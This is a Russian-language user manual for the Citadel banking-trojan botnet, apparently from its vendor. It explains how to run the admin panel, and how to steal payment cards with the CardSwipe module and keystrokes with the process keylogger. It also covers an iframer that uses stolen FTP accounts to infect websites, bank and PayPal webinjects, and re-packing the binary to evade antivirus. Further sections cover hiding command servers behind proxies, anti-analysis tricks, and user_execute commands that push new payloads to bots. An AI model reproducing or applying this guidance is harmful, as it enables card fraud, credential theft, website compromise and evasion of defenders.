Для подключения к ботам, вы должны скачать себе любой VNC-клиент, например UltraVNC(http://www.uvnc.com/downloads/ultravnc.html)
Потом указать в подключении IP-адрес Windows сервера (коннектора) и порт-сессии бота, который написан в админке или в jabber-уведомлении.
********************************************************************************
==========================>>>>> 6. Установка модуля чекинга веб-соксов
********************************************************************************
Раздел "SOCKS" в админке - ничего настраивать не нужно.
********************************************************************************
==========================>>>>> 7. Установка модуля парсера логов
********************************************************************************
Модуль представляет из себя раздел "Ссылки".
Для того, чтобы создать структуру из ссылок, необходимо нажать кнопку "Парсить новые отчеты" перед началом работы с модулем. Если модуль зависает из-за большой нагрузки или большого количества данных, рекомендуется временно убрать гейт с сервера, чтобы не забивать базу, а по окончанию работы, вернуть гейт обратно (gate.php)
********************************************************************************
==========================>>>>> 8. Установка модуля CardSwipe
********************************************************************************
Модуль зашит в ехе-файл, настройка осуществляется через конфиг-файл. Есть 2 опции в StaticConfig
enable_luhn10_get 1
enable_luhn10_post 1
Первый параметр: GET LUHN10 - анализирует данные в GET-запросах и WinSocket/Wininet на предмет карт и дампов, по алгоритму en.wikipedia.org/wiki/Luhn_algorithm
POST LUHN10 - анализирует POST данные в https:// запросах.
По традиции, все важные данные присутствуют только в POST-запросах.
Чтобы найти карты, выберите тип отчета: "LUHN10 запрос" в разделе "Поиск в базе данных" в админке.

********************************************************************************
==========================>>>>> 9. Работа с крипт-панелью
********************************************************************************
Существует раздел "crypt exe" он же "крипт ехе" и отображается он в админке Citadel. Если его нету, то читайте ниже как его активировать.
Он нужен для того, чтобы вы могли предоставить доступ вашему криптеру и он переодически перезаливал ехе-файл, который боты скачивают и обновляют.
При этом, криптер не имеет доступа к остальным частям админки, для него доступен только этот раздел.
Для начала, активируем этот раздел у себя, для этого перейдем в раздел "Users", нажмем на свой логин и ниже отобразится список опций, доступный нам. Отмечаем 2 пункта:
r_svc_crypter_crypt - Этот пункт дает привилегии перезаливать ехе файл.
r_svc_crypter_pay - Этот пункт дает привилегии вести таблицу оплат по перезаливкам.
Далее создаем нового пользователя и даем ему ТОЛЬКО "r_svc_crypter_crypt" права, передаем логин-пароль криптеру и он может через форму перезаливать ехе-файлы из папки files/
Не забудьте предварительно поставить chmod 777 на эту папку и доверять доступ только доверенным лицам.
Теперь, как только криптер перезаливает ехе-файл, появляется новая запись в таблице что данный ехе-файл не оплачен, вы же в свою очередь проверив все ли ок, помечаете у себя в админке что крипт Х такого-то числа оплачен.
Можно вписать данные для Jabber-уведомления по проверке scan4you в этом же разделе.

********************************************************************************
==========================>>>>> 10. Установка системы проксирования (прокладка для конфига, кнопка "собрать прокладку")
********************************************************************************
Прокладка существет, чтобы скрывать от трекеров реальный путь до файлов конфига и ехе.
Т.к file.php из папки webserver, отвечает за выдачу файлов конфига и ехе ботам, то мы можем перенести эту систему на любой FTP-хост(прокладка) и использовать для скрытия реальных путей.
Прокладка не поможет скрыть путь до гейта, для гейта есть отдельный скрипт-проксификатор в папкe other.
Единственный недостаток проксификатора гейта: он не передает видео файлы на ваш сервер.
Заметим, что file.php из папки webserver, не имеет ничего общего и более того НЕ СОВМЕСТИМ с file.php, который генерирует кнопка "собрать прокладку". Эту кнопку нужно нажимать только тогда, когда ваш конфиг полностью настроен.
Генерация прокладки для защиты конфигов от трекеров(полноценная система редиректов) BETA-версия.
Генератор прокладки решает проблему переноса file.php на отдельный хост, который вы можете юзать как редирект-прокладку до вашего основного файла конфига и ехе, чтобы при анализе вашего ехе, реверсеры и трекеры выложили
Генерация прокладки осуществляется через билдер, для этого добавлена кнопка "Build the bot file-proxy"/"Собрать прокладку".
На выходе получаем 2 файла, file.php, file_config.php (названия файлов не менять)
ВНИМАНИЕ: file_config.php содержит ваш encryption key в преобразованном виде, он берется из вашего конфига, поэтому при генерации гейта конфиг должен быть настроенным и рабочим.
Теперь загружаем файлы file_config,php, file.php на прокладку и создаем там же папку files, куда помещаем exe, config + файлы модулей.
Для запрета прямого доступа к файлам в папке files создаем файл .htaccess следующего содержания:
deny from all
В настройках конфига задаем url_config1, url_loader до прокладки.
Если хотите защитить гейт и создать для него прокладку, есть файлик other/redir.php, открываем его и прописываем путь до РЕАЛЬНОГО гейта
//URL оригинального сервера.
$url = "http://localhost/s.php";

После чего сохраняем срипт под любым именем и указываем в конфиге бота путь в качестве гейта (url_server)
!Важно! Чтобы на хосте были разрешены сокеты в PHP, иначе работать не будет.
Проверить это можно создав файл 1.php с <?php phpinfo(); ?>
Он должен показывать Sockets Support enabled
Прокладки на данный момент не передают видео и скриншоты, только логи.
********************************************************************************
==========================>>>>> 11. Краткий мануал по новым фичам админки
********************************************************************************
1) В админке появилась новая секция "Эффективность и Безопасность", мы провели интеграцию с сервисом scan4you, и теперь вы можете одним кликом проверить все ваши ехе-билды на палевность сразу в админке Citadel, также, вы можете установить автоматическую проверку файлов раз в сутки, и если один из ваших файлов палится более чем 3я антивирусами, вы немедленно получите уведомление в ваш Jabber, чтобы вы могли
сразу заменить ехе. Теперь механизм будет работать за вас автоматически.
=> Для начала нажмем кнопку Настройки: впишем туда Scan4you Profile ID(ИМЕННO ID, НЕ ЛОГИН!!), Scan4you API Token, Jabber для уведомлений. Взять эти данные можно в настройках профиля scan4you.net
Потом идете в раздел ПАРАМЕТРЫ и вписываете данные Jabber-бота (предварительно зарегав аккаунт для бота), рекомендуется юзать jabber.org т.к с другими серверами возможны проблемы из-за несовместимости протокола.
Все готово.
2) Некоторые клиенты жаловались на то, что лишь 40% ботов обновляется на новую версию ехе, остальные не могут обновиться по какой-то неизвестной причине. Действительно, баг остался еще со времен зевса, мы его исследовали и исправили. Теперь введен новый параметр в конфиге: timer_autoupdate 8
В котором задается время (в часах), как часто скачивать и перезапускать exe с сервера (RC4 encryption_key ключ должен совпадать). 80% ботов теперь обновляются успешно, криптуйте и перезаливайте ехе, живучесть повысилась на 45%, ваши боты будут иметь самый свежий и чистый билд.
Путь до ехе-файла берется из секции "url_loader", соответственно чем чаще вы перезаливаете чистый ехе, тем чище ехе-файл имеют ваши боты у себя. Они его скачивают и перезапускают, обновляя себя.
Если у вас попрежнему проблема с тем, что лишь малая часть ботов обновляется на новый ехе, значит вероятная проблема в том, что эвристика или антивирус палит ваш новый ехе и не дает запустить его.

3) Формат видео от ботов изменен на .webm(HTML5), мы встроили онлайн видео плеер в админку Citadel, теперь вы можете смотреть видео прямо в вашем брауезере(рекомендуется Firefox/Opera). Из возможностей: перемотка назад-вперед/фулл-скрин/поиск видео по BotID,IP-адресу,дате.
Многие из вас используют АЗ и персональные админки для инжектов/сбора акков и т.п. Вы бы хотели из вашей админки смотреть видео по заливу или как работает ваш инжект на боте? Легко! Мы создали API-систему, теперь вы можете передать BotID или IP-адрес скрипту, а API вернет вам готовый HTML-embed код всех видео по данному боту и вы можете вставить и смотреть видео на любом хосте, не заходя в админку.

4) Добавлен удобный анализатор-парсер системных команд (CMDList) в админку, теперь вы можете посмотреть в новом формате в виде таблицы, результаты выполнения системных команд, таких как: ipconfig, список ПК в локальной сети, список процессов и т.п.
Отдельный раздел "CMD Парсер".
5) Теперь при установке билда на бота, автоматически единоразово присылается в админку cледущая информация: установленные фаерволлы, установленные антивирусы, установленные программы.
Вы можете посмотреть информацию как для отдельного бота, так и для всего ботнета. Мы создали отдельный раздел, в котором вы можете посмотреть всю статистику в виде наглядного графика и подсчетов. Теперь вы знаете с кем бороться ;)
Раздел "Установленный Софт", если вы видите в графиках много "Unknown" значит на боте не стоит антивируса или фаерволла. Также, нажав поиск отчетов по боту, вы увидите новый вид отчета.
6) Добавлена возможность "Избранных логов", вы можете пометить любой интересный аккаунт(отчет) при поиске данных в админке, а потом без труда найти его т.к он будет выделен отдельным цветом в разделе "Избранные отчеты"
Также, можно добавить бота в избранное, без отчетов. Кнопка "Make Favourite"
7) В разделе "Поиск в базе данных" появилась возможность подключения других Citadel БД с логами("Соединение с другой БД").
Например, если у вас имеются старые админки с логами, вы можете подключить их и работать с ними.
Работа осуществляется только на уровне поиска данных по логам, других возможностей, таких как VNC, комментарии - нету.
Для подключения жмем "Настройка" и вписываем данные MySQL-базы, потом выбираем ее и нажимаем кнопку Connect.
По завершению работы с другой базой, снова подключаем основную базу чтобы не запутаться.
Подключение другой базы никак не влияет на работоспособность всей системы.
8) В разделе "Поиск в базе данных" появилась 2 новых пункта: "Стоп-слова:" и "Маски URL:"
Первый позволяет исключать мусорные ссылки из выдачи после поиска, например если вы ищите кейворд "bank" и вам попадается ссылка постоянно "bankofbooks.com" вводите ее и она не будет показываться после поиска, также можно сохранить алиасы (alias) чтобы не вводить этот кейворд каждый раз.
"Маски URL:" - позволяет настроить более тонкий поиск и увеличить скорость поиска данных. Здесь мы ищем только по ссылкам, а не по содержимому.

********************************************************************************
==========================>>>>> 12. Работа с API (api.php)
********************************************************************************
Работа с API.php. Через API можно выдернуть ftp-аккунты для любого FTP-ифреймера.
* IFramerController:
* api.php/<token>/iframer/ftpList
* api.php/<token>/iframer/ftpList?state=all
* api.php/<token>/iframer/ftpList?date_from=2012-12-31
* api.php/<token>/iframer/ftpList?date_from=2012-12-31&state=all
* api.php/<token>/iframer/ftpList?date_from=2012-12-31&state=all&plaintext=1

Через API можно отправить Jabber-сообщения(например встроив линк в инжекты), api считает параметры jabber-бота из соответствующего раздела в админке, а также считает всех получателей в разделе Jabber Notifier.

* JabberController:
* api.php/<token>/jabber/send?message=Hello%20world!

Через API можно получить статус ботов (online/offline)
* BotsController
* api.php/<token>/bots/online?botId[]=A-BOT&botId[]=B-BOT&...


=> Мануал по экспортеру видео-файлов для админок АЗ на основе онлайн-плеера.
Запросы такого вида:
/api.php/megakey/video/list.php?botnet=COOL&botIP=111.111.111.111
/api.php/megakey/video/list.php?botnet=COOL&botId=017_B4DF7611E03FF4C8
в ответ выдают php-массивы или JSON
Формат запросов:
api.php/<security-token>/video/<action>[.<extension>]?<params>
<security-token> параметр-ключ, который вы задаете в скрипте api.php и он нужен для авторизации на сервере.
<action> — команда
<extension> — (опционально) расширение: формат вывода. Если опустить — виден дебаг-вывод. Возвожные значения: .dump, .php, .json, .xml
<params> — параметры функции контроллера (можно посмотреть в коде)
Примеры запросов:
http://citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botIP=1.2.3.4
http://citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123
http://citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123&embed=1
http://citadelhost/folder/api.php/ahro4uNg/video/embed?botnet=COOL&botId=WIN-ABC123&video=balakhan.webm
Параметр botnet не обязателен.
citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
И еще: подставив расширение — можно получить желаемый формат:
http://citadelhost/folder/api.php/ahro4uNg/video/list.php?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost/folder/api.php/ahro4uNg/video/list.json?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost/folder/api.php/ahro4uNg/video/list.xml?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
Добавив параметр &embed=1 можно получить сразу HTML-код вставки для всех видеофайлов, но не рекомендую: их может быть много) там для этого отдельная функция есть.
Пример без передачи имени ботнета:
http://citadelhost/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69&embed=1

За остальными примерами работы с API, смотрите в комментариях к скрипту api.php
********************************************************************************
==========================>>>>> 13. Как обновлять админку и бота на следущие версии Citadel
********************************************************************************
Перезалейте и перезапишите все скрипты на сервере с нового архива и зайдите в папку /install/, нажав кнопку Update - ждите пока ваши таблицы обновятся, это может занять долгое время. Данные не потеряются.
Если у вас слишком забита БД, вам имеет смысл поставить админку заново в новую папку и перебросить на нее ботов командой user_execute http://www.host.com/newcitadel.exe
Обратите внимание, формат конфига с каждой новой версией может меняться, поэтому для того чтобы все работало корректно, настройте НОВЫЙ(идущий в архиве с версией) конфиг под ваши параметры и перезалейте его в папку files, вместе с exe-файлом и модулями. Обращайте внимание на новые появившиеся опции в конфиг-файле, который мы даем вместе с билдером.
После чего, для того, чтобы ваши боты обновились на новую версию, дайте команду user_execute http://www.temphost.com/newcitadel.exe
Проверьте, что ехе доступен с веба по данному линку.
********************************************************************************
==========================>>>>> 14. Описание опций в конфиге билдера
********************************************************************************
disable_cookies 1/0 - Если стоит 1, cookies не будут присылаться вам в админку и .sol файлы НЕ будут удалены с ПК холдера. Если поставить 0, все .sol файлы будут стерты и cookies будут отсылаться к вам на админку.
disable_antivirus 1/0 - Если стоит 1, модуль MiniAV будет выключен.
enable_luhn10_get 1 - Модуль CardSwipe, если стоит 1, будет перехватывать карты/дампы в GET запросе. МОДУЛЬ ВШИТ В ЕХЕ-ФАЙЛ!
enable_luhn10_post 1 - Модуль CardSwipe, если стоит 1, будет перехватывать карты/дампы в POST запросе. МОДУЛЬ ВШИТ В ЕХЕ-ФАЙЛ!
remove_certs 1 - Если стоит 1, сертификаты слаться не будут.
timer_autoupdate 8 - Время в часах, автообновления ехе из папки files/. Иначе говоря через сколько часов, скачивать и запускать ехе каждый раз.
disable_httpgrabber 1 - Если стоит 1, отключается граббер HTTP отчетов и на сервер идут только HTTPS отчеты со всех браузеров.
report_software 1 - Если стоит 1, отсылать информацию о фаерволле/антивирусе/софте в админку.
use_module_ffcookie 1 - Если стоит 1, то будет генерироваться модуль экспорта кукисов в Firefox, при запуске билда, кукисы будут отправлены в админку в удобном формате.

Секция entry "WebFilters"
Для активации скриншотов, вставляем мачку "@*paypal.com/*"
Если нужны скриншоты полного экрана, то "@@*paypal.com/*"
Для активации видео-записи, "#*paypal.com/*"

Подсекция
entry HttpVipUrls
"*facebook.com/*"
end

Позволяет добавлять ссылки-исключения(http://) при отсутствии HTTP-граббинга (disable_httpgrabber 1). Т.е если вам нужны только HTTPS:// логи, но имеется пара-тройка http:// ссылок, которые вы хотите видеть в логах, то здесь вы указываете такие ссылки по схеме выше, без указания протокола, т.е просто название домена *bankofamerica.com*

entry "WebFakes" - ВЕБФЕЙКИ НЕ РАБОТАЮТ!! Но раздел не удалять.

********************************************************************************
==========================>>>>> 15. FTP-ифреймер. Характеристика и настройка
********************************************************************************
A) Скрипт ифреймера
Заливается на левый сайт и используется как "прокладка": осуществляет всю работу. Нажмите "Скачать скрипт" и залейте его по фтп на какой-нибудь левый хост.
Им управляет специальная cron-задача из вашей админки.
Возможности отладки:
* Создать рядом со скриптом папку iframer/ доступную на запись. Туда он может сохранять предпросмотр ифрейминга файлов.
* Создать рядом со скриптом файл 'iframer.php.log' (имя скрипта с расширением + .log): он туда автоматически начнёт писать логи действий, найденные папки, ...
* Не забудьте выставить права 666,777 если хотите отладку сделать.
Скачать его можно на странице ифреймера в панельке: [download].
Физически он лежит в system/utils/. Здесь он напрямую не вызывается, просто хранится :)
Сам ифреймер для работы не требует никаких файлов и прав записи: он аккуратно использует PHP-сессии для хранения даннях.
B) Конфигурация
Позволяет задать:
* URL скрипта-ифреймера для запуска.
* HTML-код для вставки
* Режим действия. 'off' выключен, 'inject' вставлять HTML-код, 'preview' предпросмотр без изменения файлов на FTP: сохранять проифреймленные файлы в папку 'iframed/' рядом со скриптом (если она существует и доступна на запись)
* Метод инъекции: умный(не повреждает PHP/JS/ASP файлы) , запись в конец, перезапись
* Глубина обхода папок (уровни от 1 до 50)
* Маски для файлов и папок.
Файл ифреймится только в том случае если и папка, и файл подошли к одной из масок.
Если папка совпала с маской — глубина обхода увеличивается (на случай глубоко заложенного public_html)
C) Принцип работы клиентской части
Во-первых, перед каждой фазой общения панельки с ифреймером последний проходит самотестирование: все ли жизненноважные для работы функции включены, предсказуемо ли ведёт себя сервер, .... Если selftest не выполнен — никакая работа выполняться не будет.

Один cronjob раз в 10 минут собирает новые ftp-аккаунты из базы и создаёт задания. Повторные ftp-акки не допускаются.
Эти аккаунты постятся на скрипт-ифреймер и добавляются к списку "заданий" вне зависимости от того запущен он сейчас или нет.

Другой cronjob также выполняется раз в 10 минут. Он просто запускает скрипт-ифреймер: если он всё ещё работает — ничего не происходит, однако если он там сдох (например, time limit) — будет произведён перезапуск. Порог перезапуска 120сек

И, наконец, последний cronjob: он каждую минуту спрашивает ифреймер как у него там дела: сколько заданий выполняется, сколько в очереди, сколько готово. Если есть аккаунты с которыми он уже закончил — они вытаскиваются и сохраняются. На ифреймере эти акки удаляются для экономии памяти.

Во избежание возможных ошибок вся передача данных двухэтапная: запрос, ответ, запрос-подтверждение, действие.
Если в течение суток по аккаунту нет результатов — он отправляется снова.
D) Принцип работы самого ифреймера
В начале скрипта указан список игнорируемых расширений файлов. Они не изменяются даже если подошли к одной из масок.
Ифреймер хранит данные в сессии: они включены на всех хостингах и нет нужды играться с правами или искать папку доступную для записи :) Написан с учётом возможной работы даже под PHP4.

Ифреймер умеет правильно перезапускаться и дохнуть по timelimit'у: никакие важные данные не потеряются, он сможет продолжить с места остановки.
При разрыве подключения ифреймер умеет реконнектиться при следующем запуске.

Фазы работы:
1. Попытка коннекта. Если она не удаётся 3 раза подряд — акк отмечается как невалидный.
Если много акков к которым не удаётся подключиться — ифреймер может "подвисать" сгребая таймауты. Это нормально: он пытается :)
2. Попытка аутентификации. Если не удаётся — акк невалидный.
3. Листинг всех папок и файлов до указанной глубины. Выборка файлов и папок подходящих по маске указанной в админке. Для подошедших папок глубина обхода увеличивается.
4. Фаза ифрейминга. Замечу, что в режиме 'preview' файлы на FTP не изменяются!
Для каждого файла определяется его тип (по расширению), что определяет метод ифрейминга. Поддерживаются: html, php, CSS, JS, asp (и эквивалентные расширения)
К коду ифрейма добавляется специальный маркер для избежания случайного повторного ифрейминга файла.
В режиме smart код добавляется в начало php-файла, однако сам ифрейм выводится в конце :)
В режиме append код добавляется в конец файлов. Умно определяется синтаксис чтобы не сломать код. JS-файлы заражаются через внедрение кода рисующего iframe.
* На всех этапах собирается статистика, список изменённых файлов.

Ифреймером управляют два задания:
* "запуск" отрабатывает автоматом каждые 10 минут: он постит новые аккаунты и включает долгий процесс их проверки.
* "сбор" — каждую минуту, забирает что готово
E) Интерфейс
Показывает состояние ифреймера (на самом деле, состояние cron-задач). Можно вручную дёрнуть задание чтобы обновить информацию.
Показывает список аккаунтов. Для каждого: Состояние, ошибки, список страниц (по клику), статистика (по клику).
Невалидные аккаунты удаляются через сутки: повисели и пропали.

*) Принцип работы заданий и ифреймера на пальцах:

Задание "запуск": раз в 10 минут
Получить несколько новых акков и дописать их в конец списка задач.
Дальше ифреймер проходит по списку задач (аккаунтов)
Берём 1й акк. Коннектим. Не получилось в течение 10сек? Отложим, перепроверим.
Берём 2й. Подключилось! Авторизация зато не удалась. С этим закончили, он невалидный.
Берём 3й. Не коннектит. Тоже перепроверим.
Берём 4й. Подключились. Авторизовались. Парсим.. ифреймим.. закончили, он валидный.
Задание "сбор":
оно в ЛЮБОЙ момент может подключиться и выхватить промежуточные результаты) Здесь это 2й и 4й, если они успели отработать.
Когда 1й и 3й акк словят ещё несколько дисконнектов — они тоже будут отмечены как невалидные.

Добавленные позднее фичи:
- Режим "check only". Говорит за себя
- Опция: реифрейминг аккаунтов спустя N дней. Каждый аккаунт спустя N дней будет обработан заново.
- Замена старого ифрейм-кода новым. Если изменился HTML-код — он не тупо добавится а заменит собой старый :)
- Опция "ифреймить только вчерашние акки". Даст сутки на то чтобы игноры расставить)
- Логирование ошибок ифреймера (!)
- Умное распознавание папок (они неотличимы от файлов)
- Кнопка сброса. Благодаря защите от повторного ифрейма аккаунты она не испортит :) Заигноренные акки сохраняются (т.е. тоже не испортятся)
- Выборочный игнор аккаунтов (не ифреймить ни за что). Отмеченные игнором аккаунты отображаются сутки и прячутся. Если сделать сброс — они останутся и повисят ещё сутки.
- Сортировка: последние события (найден, отправлен, обработан) в хронологическом порядке сверху
- рычаг ручного запуска (полностью ручной режим). Это делается с помощью кликов по заданиям вверху, если ифреймер в режиме "off"
Например: кликаешь первое, получаешь новые акки. Нужные заигнорил, кликаешь второе: они улетают на обработку.
Третье задание — сбор результатов — всегда отрабатывает само :)

********************************************************************************
==========================>>>>> 16. Описания модуля "Кейлоггер процессов"
********************************************************************************
Для включения кейлоггера, в конфиге билдера прописываем новую секцию:
entry "Keylogger"
processes "calc.exe;*notepad*"
time 1
end
*notepad* поиск нужного процесса по имени
calc.exe точное название процесса
Здесь мы перечисляем список процессов, на которые мы устанавливаем кейлоггер.
Напомню, что кейлоггер по умолчанию включен для всех браузеров, поэтому пользуйтесь модулем, если вам необходимо отследить отдельно-взятые приложения.
time 1 указывает на время в минутах, сколько минут подряд, с момента запуска приложения записывать клавиши.
Секцию нужно прописать перед секцией entry "CmdList" или после нее.

Для поиска отчетов в админке, выбираем тип отчета: "Кейлоггер"

********************************************************************************
==========================>>>>> 17. Модульная GeoIP защита ботнета
********************************************************************************
Для включения модуля, заходим в раздел "Параметры" в админке, там есть пункт "Разрешённые страны", ставим галочку для включения и отмечаем нужные страны.
Все страны, которые будут не отмечены вами, автоматически попадают в игнор-лист, однако, отчеты от них все равно будут писаться, но при запросе конфига ботом через file.php и отсылки запросов на гейт, будет выдаваться ошибка 404 на уровне HTTP-сервера (это можно проверить снифером)
Бюджетный вариант от абуз. Рекомендуется использовать только для маленьких узконаправленных VIP-ботнетах, с целью перевода ценных ботов на особый ботнет.
Если заметили сильную нагрузку на сервер, немедленно отключайте настройку.
********************************************************************************
==========================>>>>> 18. Модуль "Дубль-клинер логов"
********************************************************************************
Для включения и отключения модуля, необходимо перейти в раздел "Параметры", подраздел Функции - "Дедупликация отчетов" включаем и отключаем.
Если заметили большую нагрузку на сервер, то рекомендуется отключить данный модуль т.к он не расчитан на большое количество ботов.


********************************************************************************
==========================>>>>> 19. Модуль веб-инжектов (WebInjects)
********************************************************************************
WebInjects. Модуль разработан для быстрого взаимодействия с холдером через технологию инжектов в браузеры. Модуль позволяет прогрузить любые инжекты конкретному BotID, стране или ботнету всего лишь за несколько минут, без редактирования конфига. Все работает через админку.
Краткий ликбез:
В конфиге бота, секция DynamicConfig, вписывается параметр url_webinjects "http://www.host.com/file.php" (путь до file.php). Бот дергает этот файл раз в 2 минуты, забирая оттуда пачку инжектов, которую выдает распределения система выдачи инжектов.
Если данный модуль не нужен, поскольку создает дополнительную нагрузку, то можно удалить эту строчку вообще.
В разделе "Веб-Инжекты" существуют 2 секции: "Группа вебинжектов" и "Паки" первая имеет структуру "Группа - Инжекты - Пользователи(допущенные к группе)" и отвечает за управление всеми инжектами. Вторая секция отвечает за настройку распространения инжектов(каким ботам доставляем инжекты и в каком количестве).
В главном меню, в разделе "Пользователи", при создании нового пользователя, есть права "r_botnet_webinjects_coder" это пользователь, который может управлять группой, привилегии которого назначит администратор. Иначе говоря, если вы допустите разработчика инжектов в админку и создадите ему аккаунт, то у него будут права создавать свои инжекты и редактировать их, чужие инжекты он не видит, отображается только свой список инжектов. Т.е вы можете создать 5 групп и создать 5 инжект-кодеров, таким образом каждый человек отвечает за свою группу(набор инжектов). Вы смотрите в статистике что происходит в общей системе и можете объеденять все группы инжектов в один "пак", который будет прогружен всем без исключения ботам, либо отдельной группе и отдельной категории ботов по классу: страна или ботнет.
В админке присутствует специальный удобный визуальный редактор инжектов с подсветкой синтаксиса. Формат полностью совместим с зевсоформатом.
Сушествует несколько режимов для паков.
Dual - когда работает локальный файл с инжектами из конфига + вебинжекты.
Single - когда работают только вебинжекты, а локальный файл с инжектами отключается.
Disabled - когда вебинжекты отключены, а локальный файл с инжектами работает.
Если случайно была допущена ошибка где-то в инжекте, то вебинжекты не соберутся и вам придет DEBUG-отчет с информацией, какой пак(bundle) не был собран.
В информации по боту, можно посмотреть историю прогрузки веб-инжектов, также можно поискать DEBUG-отчеты по боту и также посмотреть историю сборок и ошибок вебинжектов.
Если бот получает сразу несколько паков(бандлов) где разные режимы работы: dual, single, disabled то из всех бандлов выбирается автоматически самый "узкий режим" работы, например single.
Для работы необходимо сделать chmod 777 на папку files/webinjects.
Бот постоянно сверяет наличие обновления любого из вебинжектов, и если таковое имеется, то он его обновляет у себя.
Некоторые моменты из интерфейса:
Лимит скачиваний - если вам нужно прогрузить инжекты XXXX раз, независимо от страны, BotID или других признаков.
В каждый пак(бандл) можно включать инжекты из любой группы.

********************************************************************************
==========================>>>>> 20. Общая рекомендация и частые вопросы
********************************************************************************
Для избежания проблем на сервере со скриптами, рекомендуется устанавливать версию PHP не ниже 5.
Если вы хотите швейцарскую гарантию от реверса, вскрытия файлов на сервере, 100% защиты от трекеров и любых недугов, рекомендуем вам установить привязку на вашем сервере на страну, по которой вы работаете.
К примеру все ваши файлы по http будут доступны только юзерам, зашедшим с Испании, остальным, с других стран будет выдаваться 404.
Сделать это можно при помощи GeoIP модуля на сервер nginx, либо установить привязку на DNS.
Если интересно, можем дать команды хороших админов, кто может помочь в этом вопросе.
Как это сделать и советы по защите ботнета, вы можете ознакомиться в статье в "База знаний" внутри СРМ.
Также, хотим обратить внимание на то, что билд бота НЕ будет работать совместно с Proxifier'ом !
Если вы тестируете на виртуалке или у себя, обратите внимание чтобы у вас не было в системе русской или украинской раслкадки - иначе работать ничего не будет.
Также, вполне вероятны сбои на х64 - на система софт срабатывает корректно 50 / 50
Для просмотра видео можно использовать плеер VLC.
Теперь рекомендация криптерам по крипту Citadel:
- пеедавать адрес тело через GetModuleHandle с параметром NULL
- сохранять тело(целостность секций)
- сохранять оверлей
Инжекты полностью совместимы с зевсоформатом.
Не забудьте отключить антиэмулятор в конфиге, который задается опцией antiemulation_enable 1/0 (1 - включено, 0 - выключить), если тестируете в виртуальной машине.
Если опция включена, софт не будет работать на VMware, вместо этого софт будет генерировать кучу фейк-запросов на несуществующие домены, чтобы ввести в заблуждение автоматические ханипоты и реверсеров. Все запросы поддельные.
Если не знаете что такое антиэмулятор, посмотрите в самом начале анонос новостей.
Пароль на пришедшие в логи сертификаты: pass
Если испытываете проблемы с нагрузкой на сервер, попробуйте увеличить значение key_buffer в 2 раза больше (к примеру 512M) в конфиге MySQL (my.cnf)
Еще хотим обратить внимание на параметры в конфиге,
например параметр timer_config 1 5
timer_config [number1] [number2]
Определяет интервал времени в минутах, через которое бот обновляет с сервера конфиг.
[number1] - интервал в минутах, действующий в случае успешной загрузки конфига в прошлый раз.
[number2] - интервал в минутах, действующий в случае неудачной загрузки конфига в прошлый раз (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться обновить конфиг через указанный промежуток времени)
timer_logs [number1] [number2]
Определяет интервал времени в минутах, через которое бот отправляет накопленные логи.
[number1] - интервал в минутах, действующий в случае успешной отправки логов на сервер в прошлый раз.
[number2] - интервал в минутах, действующий в случае неудачной отправки логов на сервер в прошлый раз. (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться отправить накопленные и накапливаемые далее логи через указанный промежуток времени)
timer_stats [number1] [number2]
Определяет интервал времени в минутах, через которое бот отстукивает в админку и получает из нее команды.
Из этих данные админка анализирует нахождение бота в онлайн, а также при каждом отстуке отправляет новые имеющиеся команды,
например, на открытие сокса.
[number1] - интервал в минутах, действующий в случае успешного соединения с админкой.
[number2] - интервал в минутах, действующий в случае неудачного соединения с админкой. (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться достучаться до админки через указанный промежуток времени)
timer_modules [number1] [number2]
Определяет интервал времени в минутах, через которое бот обновляет с сервера модули, например, видеомодуль.
[number1] - интервал в минутах, действующий в случае успешной загрузки видеомодуля в прошлый раз.
[number2] - интервал в минутах, действующий в случае неудачной загрузки видеомодуля в прошлый раз (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться загрузить видеомодуля через указанный промежуток времени)
timer_autoupdate [number1]
Определяет интервал времени в часах, при котором бот будет обновлять EXE с новым криптом.

[*] Что значит Unknown в статистике фаерволлов/антивирусов на pie-chart'e ? Это значит, что на ПК не стоит ни антивирус, ни фаерволл.
[*] Если вы даете какую-то команду через раздел скрипты и указываете выполнение команды на определенную страну, например "us", то обязательно включение в разделе "параметры" опции "geoip по каждому отчёту (только небольшие ботнеты)"
********************************************************************************
==========================>>>>> 21. Как правильно задавать вопросы в Jabber
********************************************************************************
Тема вопроса: Как обращаться в support и правильно задавать вопросы и решать проблемы.
Итак, предположим у вас случилась какая-то проблема с админкой или ботом.
Что делать? Прежде всего, вам конечно же, кажется что это баг в продукте, вам выдали ошибочный билдер, вам залили неправильные скрипты и вообще мир настроен против вас! Давайте оставим эмоции на потом, и будем рассуждать решать все логическим путем. Ответим себе на несколько вопросов:
1) Что было сделано в последний раз, после чего перестало что-то работать?
2) При каких условиях это было сделано (ex: тестирование прогрузкой ботов, на виртуальной машине, перенос старых ботов)
Правильно ли настроен сервер? Убедитесь что вы имеете последнюю версию скриптов + билдера.
Правильно ли выставлены у вас права на сервере? стоит ли везде chmod 777 на нужных файлах?
Вообще, рекомендуется для серверов использовать панель Direct Admin т.к она значительно упрощает работу с доменами.
Опять же, если вы не обладаете навыками администратирования серверов, не пытайтесь сделать из мухи слона. Наймите человека кто за доп.плату вам настроит сервер и установит при желании скрипты Citadel. За хорошую плату вам поставят защиту от DDoS'a и правильно-выставленные безопасные юзерские привелегии. Тех.поддержка не занимается администратированием ваших серверов и их настройкой, мы отвечаем только за скрипты Citadel. Проверяйте сначала проблему всегда на уровне сервера и клиента(настроек конфига) и общайтесь с админом, может быть отстук упал у вас из-за того, что сеть попала в блек-лист SpamHaus? Или админка не может установиться из-за того, что вы запустили апач под рутом? А может в конфиге неправильно выставлена маска урлов? Посмотрите еще раз в главный мануал.
Любого админа можно нанять через соответствующие форумы.
Услуги админов стоят в районе 100-200$.
